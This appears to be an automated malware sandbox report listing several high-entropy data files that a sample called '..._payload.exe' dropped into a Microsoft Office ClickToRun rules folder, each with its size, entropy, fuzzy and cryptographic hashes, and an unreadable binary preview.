                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1743
                                                                                                      Entropy (8bit):7.886195480220476
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:KtWqa9TWQqnJRXKcdqmfCMAKIiewiFG8wD:eWOJsmfqFEF
                                                                                                      MD5:7B4798023E2AEB5225041A8203F8481C
                                                                                                      SHA1:F396E803FB2EB93DCB1E65705B0F939848C6AD7F
                                                                                                      SHA-256:5C904D35C1F9B7739DE074D061945D7DC3F88A9D126461516C99CB78C8BF4922
                                                                                                      SHA-512:275C7EA2176367E34376FC2413D3A4C72562D348D096D919E8FCFEE139032421B8C727AB485BFBD44AAEBE7BA2DF3A52B3E39538A12ED1D360E1A8AC076E8740
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.....!|...6.&ej.....;.R...I.F...e..*.w...(....+.>F&..@..'...d..X5<....0..@...W.(..36..4..h(...D...m...d.\.....6I.v.iNnfW....9......;...h../...}.l...T.7\...._..glm..A!..E..@7)....u.$ a`~..........3f..WC..q.O&.s...q........o8%.C.r..<#..YQ.D.h........O.g`..x...2....G.,..Q........O=VD..By0...cn.Y..9AQ.]B..y.....d....h`.s.....O..;.tR.I..o...Y.*.G...<+..S8-.[..a....1Rf;.j.......9....Z2.9.V.p..8...%.QGMDp.5'...[.",<....\.b....lY.:S.lM..~FE.8>..S..?.h...9b3....:&.Y.[..(|..0UB0....OQ..........U8...h`l.\u..p!..XCl1.Y1|.U...$f.(@*.O<2R.!49...B..~..........*..Q.M...<H..v.1%_.O...n..M.../v.........UY..M.....+D....xr!.t&.'....5ah.7V...pWu........6l....Ws...ne#...FZ...e....e2..^..*.op.4..k.h.c.ws\..B&.....HW*...J..{M.T.W..d.c....R.g[.._.,.(......[W.......b.z.-y. K...LFLF.ZP.e..N....{..-.N.U....t.b%B.N.m.Kr,.h1{@.[.`...}....b......+.a.......gm.sT=.4Q3......K.W#:..<....I.........L9>x.:m}.z....M...A.Z.f...u....u...k>.L..ab.]pV....b....{.o#.......1.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702650v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1692
                                                                                                      Entropy (8bit):7.897087717940901
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1TGEpGB7unNyOfDjENQHhLaDUE80hftZk0QtwD:pGvFuHDHlaoEFhfAe
                                                                                                      MD5:67FE61ADCECEE6FB760B7A50FB0DBAF8
                                                                                                      SHA1:E4CD34BBB97E1B140CF27423732071C30281AB1B
                                                                                                      SHA-256:338A3CA75E51B357A5AD98B56131F4ED147DD85720A858B2D3A6E4B9C82CAF25
                                                                                                      SHA-512:6FE9D42EE890689211E1789D563A92ED5695AD8F74B3E16344445DC2E137154FBBFA72D566B648D0E214526D60138556D2638280C19CB6076A824CC8CDF685B7
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.....IL.n.%.G..k..A.M?....;E...n.^..@.6......x...h.w. ._'wE....f..#.....'..h.y.S. 8.}.Zp...y....+E.V..N+{........z......G:........+...e#T..].fT../H....C+..u..q....4}..7.].5.aW...O...X...Q.S..8.hM.rP. .y.~.M..:b...Y.-S.....Aqj..c...Q...v.}.N.V.....>..p.....=8.bwPs.n...Y]..M.B+.;..\....hD....^vE.<<.........;.].8..3..(..U..&.:%0.....h#...[....T....Bc....y.k...{U............f.V....oB"f.a)b.9......<.m~.....>.1.R.{...5.*......R.0.K.(........V.>V.G}......5-..z,.eX.H..D.=#.....'!..Y?8M..k.,....:S^....-]tK..?...Q.v.....>..n....r.._).....Mv.f.na8..._.iA.....(.E..L.H....0.o.8.y.....g/mQ\...."OV...$wK.0..k..>S..-..F^......).s^*&[....M.........Z............b.t.2.r........t....FU'5E.+O.#.)d2...@Iv...]..1uu*"u...&s.H...8". Z..%..n..s....~..`.@d..X...e.D..I.#...j.k.......rS..&....Y.=........U $m1..U4c...I.^.<u6.-....;y...y..H.......f..h.`_B..&.?...7^.r......fM.!'d.:0N.,O.....^.`.3...K.d.nE,..0](...hA....|s..Kq.a......._-.O_..A/ri..yG.SN'>v}<.......H

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702651v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1729
                                                                                                      Entropy (8bit):7.867792590653927
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:UFYOgrhBcR7cUjUCr0f7wyo7Eqg4Gm5wjXzG72uiUW58hkiewD:dOcne7cWATwtEqPWjXKiUWGFT
                                                                                                      MD5:0C211D5710F15B4074F81F4E9A844175
                                                                                                      SHA1:379B885886B5997388CA44E922D2FF2802D9A7DE
                                                                                                      SHA-256:979D260754D4ED6AC76D69D0958FD4314247E851E6BA26CB90ADD5B5A4620CD0
                                                                                                      SHA-512:21A56B28931BBBC5BD2534229E874004BDAD7AC986148A8D2FC3A6AE5E3789E3AC8E0D8FFECE8AD0EEBC59D56C33C681BF3BAFA797C6C0BCBB073702055731C2
                                                                                                      Malicious:false
                                                                                                      Preview:.<?........J......Z...9....H.<N5. ...k.3XJ.S;q..c...S+I..l....x....Uw......}2.-5.R.!..1F.x6^...r..u.$u...K.{z.i.v...l.."}i.L.@B.+..M$g.>....p...vf.S=jB.S...QK..Z..IF..%.....f`*..m.H....##.)8..T..A?.......a.o....'!.sx..$;.~."}O..]....t.0...{.G.......N.....r.JDF.4..=.2..>..D...!..T.s...e..Ioc../.m.n....u....e...1.')qm.I.9.1T.s...I...s..TQT.JZ"..q.d.8/[......K....S..<.u...^f.....H_........l.......&40.U.L..........`.M..g.....@JBg.....K8........([#.....8.`c_....4...\......|..>..[.B.9..........QZ.}5.,.g..F..6#..Lj`.z...~.74.......|G.nUD .7..D...h.m....lci..k..X.}..c.~.v._.9..".........f...f...yY7*Q..M..g..2....=.K..>.Z|..4..g2.....p.U..r.s........F...@......I...I;.W/...V..s.QI.H.?..R.......6.iS...j...z..C...y..U..^r.M4.t.Z.|...S...n.J..h....[.H...R.>e.M?..K..b....(...KR.O4.n.`l.~G+6.}.2S*yw&<V..%...+....D..M=.."..g,....f.c%..s.....P...y..E.....F..{....e.....a..'...V.)..3.b.....9.A.".y.L}N...%._..'...6H..U...a?.=..c.l...]p\.v(.<g.ty?.T.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702700v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1701
                                                                                                      Entropy (8bit):7.8911891899423345
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:M0ZDWD0dJchz2sEq82P6G48MRNXroJpv8PhfwD:xLgzP13ybov8p0
                                                                                                      MD5:8F0ACAA5A290D9F77C42CA46756B7A4E
                                                                                                      SHA1:CC946092C6778E6F17094A251D280F2EA30B9B45
                                                                                                      SHA-256:A30F60726519418B75C5FED3EA8AC795B498E5FAA57515A9308FA8C3CA98CD5F
                                                                                                      SHA-512:99AA5702D9F55201274C1FC0ABB95523D5F282DCA9868F9891243BC51388069F5F1CB9072935B79BE77BDE9ED5495F4978221BEE37BD31F0773F3B5110F6FCE4
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....g.<.^Z...4..F....w.pT.s..IRc..+..z...G...x.pa.....>..y...._;.....L .>d8....'(.`.7.l.68r.....;.r..*.Dom*.\.6...."...w....Y{....G......W.B *....l..8.HH.G$.o....O#..).J..>...m.^..KF<.5.&....c.....M.....+....|.FtL./@^kGyK.V.,.6.D...k.....Z.....8...n....9.U:..n.:..!;...B........"6..1{.<......cf.>....&. ...n...H.f.0.\.(e\.....J;S..9...sn.>R..T..h..*..zO.....D....^k.^.*e...-..-I....w.Q_M:H.:.bkf...FI....D.Hm.".gV..~o3..l...Q<...#...W.R..&.....|...7.\.. ../.ZH.......n......nf<r....["s.....d...7>... .-X Z..v.|.:..*q....&{...e.N..%v.0....ujTX{...DVl..#3.L..Msh....h.G>..p..>=.....K.l.vt./.cS_..~f .rV.....g..."a;Y..m..8O..(?.N.F...V|x._..h..a.%.ue..#E.$..],.......'.\Z...2..vQ.\....v.|......#...P.C...5.H..x.l.H5.]..U3..!d...s..d..eo...b....&F.Z...lI...>.//..-.....C..N....G.P..#R.}_d.Ys..MG11.eu..j.P..R.Q...E...,....na.T@.YeK......L....a.i.`.Q..F.".u..:....',q...9.`........t.].W.....j.....k<d..]..,.=.....N....tV..$..=.8..UB...O....$.#..x..r./

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702701v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1738
                                                                                                      Entropy (8bit):7.882960395786066
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:jej9fiSiwDS/AJuFnzfMud6biLhRFJ5hPywD:j2kSiVYJafJd6ARFfV3
                                                                                                      MD5:4CF76A069CA73C8C59E079287EA036FD
                                                                                                      SHA1:6253C0C47CEC2B39F4E379D8508152A854852104
                                                                                                      SHA-256:0BDF635CE757F97C0061D83CB552004DAEE65FE3904F00F58B61E32EAD0A050F
                                                                                                      SHA-512:A19BAEACCD2456CE538C7D6FB5D978FB91C76705622D2A13EB4171524239E861479AF434DA35FA813EE575509A859938052DE9276B8FB2A6C65752D9CB516E5F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?E...1.$..M....[...+..j.8by...Y.|.........P.K.?.?....c.I....@..G&.d.Z.Q........7..!P.7.{=.q.D....TT>.e....?(F..&.E.b...=....0....bZ..(..)p..L:.[.?..#.\u....e...Q...L"ME!.........-..^.....p/..^.....-.&.}b.8j.T.....*`H(.f...|k2.HH+...|e..\..~.&.w;...c.4?.......>.\E-....<m..'._.2..P.s..)..q6P......\.......<...\...tI!....=...Gtg.....'9..Z..H...... ...Q..8;9.s...O..."[...K......G.#d..Q$.`gQ...an.....y.<4.K.]1.L,...g....S.N.&-D6.....y.d.U).....7.[....."..X..D=...3.8..q.....8TY7.V..ng...Z.#...l..W0...b.!...3.=...?cV......m..|.Z..M...=.{..}YK3i[^?')....Q..n.0...Ir..N|a...de..R.K..}`.Sdlo8Kp..n..>.#..H9....l...n1..b....,7'.H...FVQ....x..^.H..KB...Z. .6.9..(..!e|...3.3Q.k(.."....o...+'...d...D.K\........5.{.4.......4&.Vx.\l&.........k.:Hb.^E.4...b....c.[B}.j..E.......h.......V.V.:>..LU..SHZ.V(."..:.H.v....e......*x\.$..E.....hV.2.M.om.g.o.....{.....&.,.5.2.aP.;.........-.....k.......]...<.1(...O.....|[...HS.G.-....@@..xXQ......C........L.....:..|.y.~s.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702750v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1700
                                                                                                      Entropy (8bit):7.881627698027104
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:OyS/oe6S/nfNZgEqv+zX5YTfEk5Uj51qwD:Oy0jt/nfNGv+jW3w7
                                                                                                      MD5:5167968E49399DDC15660DFFC0F0B834
                                                                                                      SHA1:F83EE97A8987441D79C6041D60E07FB651AB912C
                                                                                                      SHA-256:887FA10A6898397857E3CB30FF7F72B30296378E6C7E8F9B95DA490D0C33D546
                                                                                                      SHA-512:6FCF5D3FE2BB6EFA58BDBFF0BB173E85670097B5BEA3E14F0D032C36D0E26963B406A2704D908BB773EF91CA8409289D20EC832AFCE0CE43120F77CCD6A90A8C
                                                                                                      Malicious:false
                                                                                                      Preview:.<?ch.....m.W...P.|C-.:...M..i..R>.G.}.@.#S;..~H.Jd?.[..s......Q-..c.g.Z..R.dQd..y..(.....,..>..7.>s.=....{e\.DQ.....'Pk$C..R..k5f..qi.Yz.b..21..3.**. u?..\N_..C).]Da~...A.....+.?..j ...P.v.....R...k(.....K.4..W...`.......~b....].KMy.4...9aw^......e..]...g.?.'.B........W.r..)h.......Q..#......zLT.e.....#..9R.5]e..$....>.\.)..rE..8..:..qpa.s9..P..j.....B=.....{N.>...u!j.JH.-.Hd.._ePn..G t.o.1...;..C.i.q.........l.|......3..e..0..M..7s..>..y~.Y.0!..ly.@....Z..eb..g.....mW...8..X....G.......-.(..PgT.....S.D.m.....$..!...9.8$<u..Q.....C......y...,WT-o.|@..]....g.../.e.u.....r........1.Ul...G9y5Tk....>.|w..uLese..6.."..F.t.Hxcll..W..[-.. .....s..9E.8....9;.&......!?r4cLt....o...7... .[....a..W(j47...^:........5G......q*+GN&..>.....))]J;6k.........h...'}...1.f.g...{?.&....@.B2O...GT.C.\^oJ...k....n...X8DS..m.z..t.._...u(....b.W...u...`.Vu`et.....3.d$2.[.9.NT..ZU.;.."....'M.I..."...8.>.......$v.07a......4d..US..<..buG.(A.._tZ.. ...x..Xum..4

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702751v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.874721236950118
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2PLLCTV0yalxK1GrDk8AkyQ8nENxgAJNwD:2PLsWY18Y9QDxy
                                                                                                      MD5:B0C046C385E7469E2E9A2E1B3A7FC7D5
                                                                                                      SHA1:C46EF7FD340A7049ACE216D3E2026950BF0A4146
                                                                                                      SHA-256:4E3FBC2A8F84D1E34810BFEBE6AC8F027C69482C498D3A54CA418AD885AB6F27
                                                                                                      SHA-512:C4C82D1DFD502CE653BAD002A422F1C1199A696E0434A3E675BC084DE5615C9678C3218149874C1A3DC2C5AC0CEB9AF5010BA29237FD0EDAFF60907073E58075
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.J.]...<.:.^...i.]C..8E..g.V.R.A..p'\.w..5..?"..|Jh.t}....C.},A.a......R.H..M..jW..P..{.......6........-W..C...Xx.A.....I.....+V?.....K.........01......Du....Dd.c..YW..`..IC....f......Y..hc4C Gw...q. n1...I...N..y.OT\..U.MzV^^l.B...n....H.$.......@t3F...G..O[.C.k..>p".. ~..,.v..'...T.W...<6.....0In=,..a.9.6...B.F.w.\..F.0Q]G..JLZ4Y.}.......8V..+&q!-.P.H..a..f=...^{.(......Wo......!..~...Yd.s..-.r...V-..+...I*....:.\?sYl..6.`......R....i%.5......Z.=I........8.......I..,......K&....wK...b.F.\B&.+z......3..n<`....$.z. ..d.&..9....m<,....b#\...E.........FPP.......V.b..c....qDf-C...f..<.....<....2.Sc.S..E0k/. ........`!5.z8.Q _lz.....@.....MS..L...V>.A..u..|..%..4..wv..!9H.U6..J....#.....NgdsdV7.}...._....c..GL=.C.4.-.Nf.~.,\.p.p.aJ.*l.=T.C..w.Y...{..V.@.%..Tn.|_... [.Q..}..]|....L^.D.*..1If..us.#..S'........_....1..w...>d.{S.l..........k.5.g..........t'..5K...g.J..a.>...H.....p*.|.y_M.Pi....C4v.~.U `...F.1W...7....x..L.9. ..%9.NI.4..G1. 4.y.R.K.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702800v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1688
                                                                                                      Entropy (8bit):7.878071007475626
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:jAxugIhvgGPfHQnGA9NTOuGiOPzshb+uX+Jz3NZK5iWjuJIHBchRQwQVLuLv6bD:MxugIhvgYQnGAbajwk3LK5pS+S7NLwD
                                                                                                      MD5:D3D2DA6F8340B4A3897ABE6DF68F73CD
                                                                                                      SHA1:ACD82269F8ADFA830059F771A4F2961002A4F98D
                                                                                                      SHA-256:D9C0C606D0BE797E033C16805A3F32F63B57F973C90DF3FE24B60473DF7FA1D9
                                                                                                      SHA-512:B8666B38AF1FBB42BC4448248DC8332C38DF000F45E15121534265DF9241595D79CF3CD3EB8D35B8B97530157BE40BD53924BEB1198B6083DA477E68354D1DDF
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.[...y......>.~.d2.v.E...`g....7.%f..+._v..wV\.P:...D.;...YJ.k.9.#@|...iA.w.[..?{).......z...F.q|."....)j*..0.....^..c.?.?.V....W..&..O..h[..,..2;&.KS..\..1.D..P.?7......C...y.IR......w........YZ3..o@<e<.-...`..#....aHP5.........@.....s...B...G:+{@3.xR.p.../j".".....;daR...#k..[]7....\.nf.^_.......e.)..Ma.w..d.m..DTDH(..)D...f.....l..:R.A....l,S$<..\".+\.d+...".&.....[.o..uo..8Lx.#`...d.x.{..XS.2W....e|..\H..^.O.*......n......M6.W.... ...ocVA.b..f...p..(...}g...3.......>...82T..\.T..Sl......;.....W8...)..L...OZ.4..u{...\..l.3.......-.w@$.f..Hp=R.T7...r'....%@'.bG....'..KT..|......v...=......b.o/...........;..xb.[.#.?{..;.6b.C..+....3..k.9|...2G..<G..k...x$02.....HW.....-.5j.Z.*HS....xzWN..K.b....[..3F.{...~...n....xi...!....@.P4T4..0..I..=.....R..y&..%...5!...6J.......3...A._.{.(..:.'.7d...........; ..J..?..).U|.J:u. .%...d.>....@n..u...Oj.n.$.K5.8A..z.@:.c.{.....7<F|V.,v..FZ.B0...t?.|...:X..d.G..z.......yn.d.V.C..yX.^.v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702801v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1725
                                                                                                      Entropy (8bit):7.881238142600214
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ILhMS6FybCQRPcgiLTUSgLizw79aclDAXZmRQnh3SpQIbwD:8MSyybpr2TiiB/ZlngSV
                                                                                                      MD5:9052CA21EDEE463D2009461CDE355BDE
                                                                                                      SHA1:FBA1637F0E7D39BBFD421F9C0A23932D37E38B23
                                                                                                      SHA-256:1DE747DCD075BBD69CF8CA1BE047CF81541076C1F529ABD2229154BA9E7801B1
                                                                                                      SHA-512:C40523E12B19901DF96F997B6BA1DA10EBE8972E227AE011FD39031171CCE41D0424D2B12463C8BF880C1F9A9B0CC5407947014144B0CD8D5C62308F8DBAF704
                                                                                                      Malicious:false
                                                                                                      Preview:.<?d..L.WUo....38...aT......ZL0.x.F...@)....6.JQ.....ez.....4ot.....v..l..X.>...#!.@"...^b..d....{.k...0).:....!O.:o..U.....K.p.....l.P.y.Q~*..|\...."....{.-.R[....o..}..KM.....P....y.Q<.C..1.$...v$fD.q.Q....V...Evh.q.C?.Vk...V8n.q....k yO.HX.......\..6...wV..NB..=..QG5..T..............X...J..i2.s|'(..._..n.....N.9m+..q...f.....V.pv[..QKz......(..@...@._..ztX.{s.c......Z.......;........7..NA.[......2Uf..i.,dd..Y..}.....7.\Q.(.%2.>.N.........cP!...=d.nM{;..9"m....I.8.PE......E..A...{..9.OY.....sJ..U..*0C...h.N.j..O=-..k.......L{. o.~n.\..z..w...4.'q..z..=-....C.T.C..T-...l..+.4.......(.Z]........L8.C....2.G..7.._lY.......s.......yb.Zh........Wn...rb$...g..*.$.?>.k...7....W.M.J..kg|....z.d#%.).K.1....ePf_..jx.E....c.J>Wz...g@....>E.n..(_.7..:.......J..>..)..C...6....t........%.[.v..Q>T.U#.J....**?..Q..|..F.i.....B..=....b.....%........iQV..b.xw...R.......d...z...$....n.z:MZ...T.c..9Q...Ox..D.T{s/.x...0|.q,...`h.h.#.E.4^.....OnR.f<u$./..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702850v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1702
                                                                                                      Entropy (8bit):7.899484857024157
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tSmmQ/zkU8q2iEaYZ/McjZnOQUKJ8r5v2uWDwD:tSmmOzT8q2p8QFE5vuo
                                                                                                      MD5:31C30F1E7C3923F87CB2F4287F1BB8CD
                                                                                                      SHA1:50A2B4BE43D8DCB138D5290534F5EEE29135E13F
                                                                                                      SHA-256:9374A2E32A008560EB2E70AFA6D14CE4FEE125C637CF368AC95AF181D544DEAD
                                                                                                      SHA-512:CCEE6BC282C5F29A0008194F3128C0C8BB7FC867B0905EDF1CFE2A79448C860DC84F97ADFE49F35BED9DE7FD20D1A2513B377C88EAC045673185269899F77D33
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..is.vR.4....C.W.....W."G....;..5.y...+.D.|Q?..Ir?.p3....?...$.|.[...a%.....$...8x..ym.....i.s....1.. `@N....9.8.9....E..F-.e.H<..o.feg.<D.L......d..R....j.#......_..u...zF.......s..M+..........?.)-eM_<..c.P..Yo.>r.....&?H.....:..S]..M........!.i*'...rt..?..Z1......S3VH....N}.k..ma.~.M..W.n.1..a^.f........cl+.D..H..,......I.l.l8 .............<.+n.........K..^_F.|w.......s......w...\)Z3..,...X...}.T..B...L.MH....R..w.@.K.....c...\.H;......]..'...G...F..$......}Q..[P.eI..Vq......).....t..$A..b./",.t...{..........y.....yX.....Z.n..7h...C.m.k..e.f..>.;.z..../......:.?.\...6C.. D....9......V^Vc.!...rFb..L..:..5.V..b.H.'....83B.._.....b.?..w.\...xH.,.S@.7`....z..d..].;o....C..=n...>/..b..P<. .Jq...$40@.|......G.9).J..t..j>....v. S%.$...."..I.^.|@......)3.|+*....{D...3.(..i.?B0.M.... ..uw.%oG2.J.3|&.s...Y......tj.,....+....%......`U.0...k.J..t.....3lY>....S?..Q.[...tI....I.....F.ycm.IK.N.Y/...fl...6.....[>.jTA^p}X...S.8s.+XA!P...2.I...L...?s...;

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702851v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.892419203444758
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:uWQHLDZpsAOwIkzmVrFd4BUQYVu5HQzSWVRc5wD:hQHsAAVpWBIO47d
                                                                                                      MD5:2A0B05A98616226CE7D3A3C5B160F9F2
                                                                                                      SHA1:984B3208C33E77B8AA9AB29E0722F4EAE816D1DA
                                                                                                      SHA-256:D4187C9EBFEB02B984B3DEF262CFDB90658A7139949B609B77B6D071E7A06E43
                                                                                                      SHA-512:41F92B10D3640E9C0E9E9D26F7EF750BA23E4C0175792A65BDAA5ACA837A6756B6A77B05A0AF6F1EE5FDE2E2AD9A596915EB499497093B60B5CDB510A2D0DE09
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.r.&!....n.......@{.M....:.n.=..{=o...7....._......O0..B.....i....Ml.)A..e[$`Xn...=].>..Io..<..2Y.m.k5.....F.`..U73.../.h0...-.d....D7.;.Y..U.Oj..?<......bD...0%6...{.J.....d.............B....P.....]........./..3PLJ...n4(...\......B.."...'.".B.....:..~..O...?...x'(t.Ag"j.,..`.s....m.!..l.Z.aZ...FcM.l.].......Y..8~.D.F.GG.!..cf..=..o...D.v.( 4.!S..i..>j.B..:U.?.+........F......9?39.........t_..t...P...W.0I..w+V.6KGaE.......~\.#....N@..F...C..'.4~..N.....)gq..dv...d4...Z.z..#..0\..G_...u.......,6.O.:?..'.p..B.1m...%../.kl..9..P.D.H8.T..&Z.....L..x.g...~...;...MA...b.O8s.\h.~........rj..$Z.7...S[..sk|.....Q..I........dv]5(],.u#'..Z<.K./,>.#.{._.r....=$.._.h.S.....e|zYzd..&...?...5./G.o3g.".,.....gfuFB.."7....5.....y~./...<..=l....l}.65H5.E3M..F...+.'.c..N..FT.*#.u...?28e........QG.V..\...<..#...-..y:u.}..%?.Z.......d@.Q....XH[...3....m..4.I.....`r.*T.=y.+...I..Zz{..}...`@-6.;...@#l..t..:M]...<E+,....i..5y..].\....v...i>..`.wE.!1.B.U.4..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702900v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1708
                                                                                                      Entropy (8bit):7.87607947865506
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Mmnqs5LGb7O6yqnuJKuQGP0xsoSrwYK180VzkWgLXi9KKvpd53WFgL8qm2FppOL6:dnqsfrQnioSrwkBWg29pz5Z8qm726lwD
                                                                                                      MD5:83FF0DF74C8B7B4AFD89BCEC4F95D680
                                                                                                      SHA1:D4AA7FA886C499BC215AB1D8EA6DA97197E8F959
                                                                                                      SHA-256:5D185529AF31FEDBF3AB7DBA288409167F6BBB4A3F5A3E5916A8429344BA1C7C
                                                                                                      SHA-512:0987DF1594A3D674900DA442F28BBD4F35D04C26817C88CF2133BE511B2B6379562433384EAF416A8E7A18370DFC58B564B776A4E4CA0D249917E192373B8ECD
                                                                                                      Malicious:false
                                                                                                      Preview:.<?(.M..I..l.k.:91.....D..Z..._I....l.O.)...wi.66..d+*v...........g.9....M.... .e.?.5.@.....V..y.....J.i....x.I......Zo.&.o9.gb..~Nz..-m""iT.sP.......p.>m...v.S.6z....~...S..Rz.e..k.....J.7.N.}vB0....n..1E....[..`......q....i..?...L.f......X..31...xt..H..F=-..#.!m..np.x.2&.C..d*...1......C....+.>L.Ef^C7.A*.n .6..Nm{./....o1.A.*A.B\.[..G.f#..u<Z..`$%........... ..+.....*.t.~_....Xb...yIF....)....n...K.p...<.=dxG"...(..B..]..k.S>:,..3}..lq.(............U.......?....]-....R....;......F..$I.>.....-9.8....,....7I=9.}1:...7ZD<...R..Y.L...E..W..\D..O_'K...u.R.].))`...H....}.a.;.+f......y.>....F.=.S.M8.U..h.&....E..J......3.U..p-.4..JR..UJn.a......2.6.f..6O..Bl,R>S1.]x..3......6.f....}..bp~......r...y]R...S.&.X8.zA.......".Ig....j..k...Q@...wh.DU..4Wig..F.8.h?^.GC\...b.......5.......@5c.l5ww.Rl.j.4@V..?...68.b.dZ(s..oBk.|....(e.<cf)."v.z.......S...a.i.._w.*.......b.~..O.R)d...bC......x.F_..>..I#......X.....C#F.Kn....i....K....o....:...t...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702901v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1745
                                                                                                      Entropy (8bit):7.899277643024808
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+ZHrr7/Bz9jwMy4zpj13tZ+rPBT2TsbBPu0Hfh33sPwD:o37pz9U43tc2TsbBPPfSk
                                                                                                      MD5:386E3B711C2A4ADB19837BB30B097EC0
                                                                                                      SHA1:83BD7E1D56C317C7AC355CF8F1AF7B283C5CD8D6
                                                                                                      SHA-256:3F57A909C14D567AC6C075B5C637A08E0F9E5BC008A2CC0A1717B6681A70302E
                                                                                                      SHA-512:6D93AD902567782CD7C38B159C03A82BBDC0AD92C1E4305F118F49F1E5D98241EF2C58CA8BED225FFEEEAC4FF6E1EA4B5B7BF11F66C204EB6BC7B0DBC5570050
                                                                                                      Malicious:false
